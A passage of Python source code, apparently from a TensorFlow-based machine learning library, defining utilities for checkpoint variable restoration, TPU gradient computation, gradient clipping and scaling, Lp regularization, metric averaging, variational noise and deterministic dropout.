var_names_to_override = [var[1].name for var in to_load_vars]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
restore_fns.append(
OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
loading_rules[1]))
var_refs_overridden.update(var_refs_to_override)
var_names_overridden.update(var_names_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def _Restore(sess):
for fn in restore_fns:
fn(sess)
return var_names_overridden
return _Restore
def ComputeGradientsSimple(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
activations_grad=None):
return tf.gradients(
loss_or_activations,
all_vars,
grad_ys=activations_grad,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients for local loss across whole TPU cluster.
This implementation specializes for the case where weight params maybe used
for different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss_or_activations: The loss or activations to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This helps reducing the number of gradient all-reduces
when doing gradient accumulation, which does gradient cross replica sum
only every k steps in a tf.cond. Currently this works only when
skip_zero_gradients is None.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
Gradients to be passed back. If tpu_embedding_activations is set, their
gradients will be placed at the end.
Raises:
ValueError: upon invalid arguments.
"""
if is_activations:
assert activations_grad is not None
if not skip_zero_gradients and not is_activations:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss_or_activations *= tf.constant(
1.0 / shards, dtype=loss_or_activations.dtype)
else:
assert not tpu_embedding_activations, (
'Gradient computation for tpu embedding activations requires proper '
'loss scaling, and so is not compatible with skip_zero_gradients and '
'is_activations.')
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(
loss_or_activations=loss_or_activations,
all_vars=all_vars +
(tpu_embedding_activations if tpu_embedding_activations else []),
grad_aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients,
activations_grad=activations_grad)
if tpu_embedding_activations:
# Note we don't need to aggregate TPU embedding gradients below.
tpu_embedding_grads = all_grads[len(all_vars):]
all_grads = all_grads[:len(all_vars)]
else:
tpu_embedding_grads = []
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
if defer_crs_to_apply_grad:
normalized_g = tf.convert_to_tensor(g)
else:
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads + tpu_embedding_grads
class VarGrad:
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def SkipNoneGradients(var_grads):
"""Removes pairs whose grad is None."""
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def ComputeGradients(
loss_or_activations,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
skip_none_gradients=True,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss_or_activations: either the loss, which is a scalar tensor, or
activations, which could be a tensor or a list of tensors.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
- None: do not skip zero gradients;
- `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
- `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
skip_none_gradients: Whether to skip gradients that are None.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This applies to TPU only.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
If tpu_embedding_activations is set, a sub `.NestedMap` named
tpu_embedding_var_grads will be used to store the VarGrads for the
activations. In this case, key is the feature name, and var in the VarGrad
is the activation tensor (not a real variable).
"""
if not is_activations:
loss_or_activations = HasRank(loss_or_activations, 0)
if not tpu_embedding_activations:
tpu_embedding_activations = NestedMap()
assert isinstance(tpu_embedding_activations, NestedMap)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss_or_activations'.
# This doesn't work if the training loop is wrapped inside a tf.function,
# since all variables will be lifted out and trainable_variables will be
# empty. In that case we skip the check.
trainable_variables = set(tf.trainable_variables())
if trainable_variables:
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
assert not tpu_embedding_activations
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar,
defer_crs_to_apply_grad=defer_crs_to_apply_grad,
activations_grad=activations_grad,
is_activations=is_activations,
tpu_embedding_activations=tpu_embedding_activations.Flatten())
else:
assert not tpu_embedding_activations
take_grad = ComputeGradientsSimple
grads = take_grad(loss_or_activations, filtered_vlist,
grad_aggregation_method, colocate_gradients_with_ops,
gate_gradients)
if tpu_embedding_activations:
tpu_embedding_grads = grads[len(filtered_vlist):]
grads = grads[:len(filtered_vlist)]
else:
tpu_embedding_grads = None
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
if skip_none_gradients:
var_grads = SkipNoneGradients(var_grads)
if tpu_embedding_grads:
# Create VarGrads for TPU embedding activations in a dedicated sub map.
assert 'tpu_embedding_var_grads' not in var_grads
tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
tpu_embedding_var_grads = [
VarGrad(v, g)
for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
]
tpu_embedding_var_grads = tpu_embedding_activations.Pack(
tpu_embedding_var_grads)
# Replace None gradients with zeros, since TPU embedding expect all
# activations to have gradients.
def _NoneToZeros(key, var_grad):
if var_grad.grad is None:
tf.logging.warning(
f'TPU embedding gradient for feature {key} is None. Replacing with '
'zeros.')
return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
return var_grad
var_grads.tpu_embedding_var_grads = (
tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))
return var_grads
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
# Note: IndexedSlces appears for embedding lookups.
# Embedding lookup ids can have duplicate. For duplicated ids, we
# only want to consider once for each ids.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
# Counts is a vector of size vocab_size. counts[i] is i-th words
# occurrences in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in x.items():
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
# divide_no_nan only supports tf.{float,complex}*.
dtype = values.dtype if values.dtype is tf.float64 else tf.float32
avg = tf.math.divide_no_nan(
sum_reduction_fn(tf.cast(values, dtype) * tf.cast(weights, dtype)),
tf.cast(total_weight, dtype))
return tf.cast(avg, values.dtype), total_weight
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in m.items():
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(lists_of_metrics.items()):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in m.items():
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(lists_of_per_example.items()):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set(
[k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics]) # pylint: disable=g-complex-comprehension
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
raise ValueError('Found metric %s which exists in more than one'
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
def AddVN(p, x, per_step=False):
"""Add variational noise to x.
Args:
p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
x: Input to add variational noise to.
per_step: Whether to add per_step noise.
Returns:
The input with variational noise added according to params.
"""
if per_step:
if not p.vn.per_step_vn:
return x
else:
if not p.vn.global_vn:
return x
if p.vn.scale is None:
raise ValueError('VN scale must be set.')
if p.vn.deterministic:
seeds = GenerateStepSeedPair(p, GetGlobalStep())
if not p.vn.per_step_vn:
# First element of seeds is global step.
seeds = tf.stack([tf.zeros_like(seeds[0]), seeds[1]])
noises = DeterministicVN(p, seeds, tf.shape(x), mean=0.0, std=1.0)
else:
seed = p.vn.seed
if seed and p.vn.per_step_vn:
# TODO(b/171767456): Fix per_step_vn.
# seed += GetGlobalStep() * 203984
pass
noises = tf.random.normal(tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
noises = tf.cast(p.vn.scale, x.dtype) * noises
return x + noises
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None,
deterministic=False):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
'Std of the variational noise to apply . This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
'Adds global variational noise every training setp iff True.')
p.Define('per_step_vn', per_step_vn,
'Adds per-timesetp variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
p.Define(
'deterministic', deterministic, 'If true, generate noise using'
'stateless random ops that are compatible with TF functional ops.')
return p
def DefaultVN():
return VariationalNoiseParams(
scale=None,
global_vn=False,
per_step_vn=False,
seed=None,
deterministic=False)
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same to DefaultVN()
# which will be updated by parent configuration in CopyBaseParams()
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
# Step seed keyed by graph.
_STEP_SEED_DICT = ThreadLocalDict()
# The step seed will increment by np.prod(_STEP_SEED_INCREMENT.stack)
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
"""Adds an element to _STEP_SEED_INCREMENT."""
assert step > 0, ('%s' % step)
_STEP_SEED_INCREMENT.stack.append(step)
try:
yield
finally:
_STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
"""Gets step_seed."""
key = id(tf.get_default_graph())
if key not in _STEP_SEED_DICT.dict:
ResetStepSeed()
return _STEP_SEED_DICT.dict[key]
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
key = id(tf.get_default_graph())
_STEP_SEED_DICT.dict[key] = tf.convert_to_tensor(seed, dtype=tf.int64)
def MaybeResetStepSeedFromScope():
"""In graph mode, resets step_seed according to the current named scope.
This is used in graph mode to avoid "tensor is from a different graph"
errors that happen when we share random seend tensors too much.
See b/129159299 for more context.
Eager mode does not have this problem, so in eager mode we do nothing.
"""
if not tf.executing_eagerly():
ResetStepSeed(GenerateSeedFromName(tf.no_op(name='new_step_seed').name))
def MaybeResetStepSeed(seed):
"""If we're in graph mode, reset the step seed."""
if not tf.executing_eagerly():
ResetStepSeed(seed)
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
inc = np.prod(_STEP_SEED_INCREMENT.stack)
ResetStepSeed(step_seed + inc)
return step_seed
def GenerateStepSeedPair(p, op_seed=None):
"""Generates a seed pair for deterministic random operations in ...
functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(GetGlobalStep(), seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
op_seed = tf.cast(op_seed, seed_dtype)
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - tf.cast(
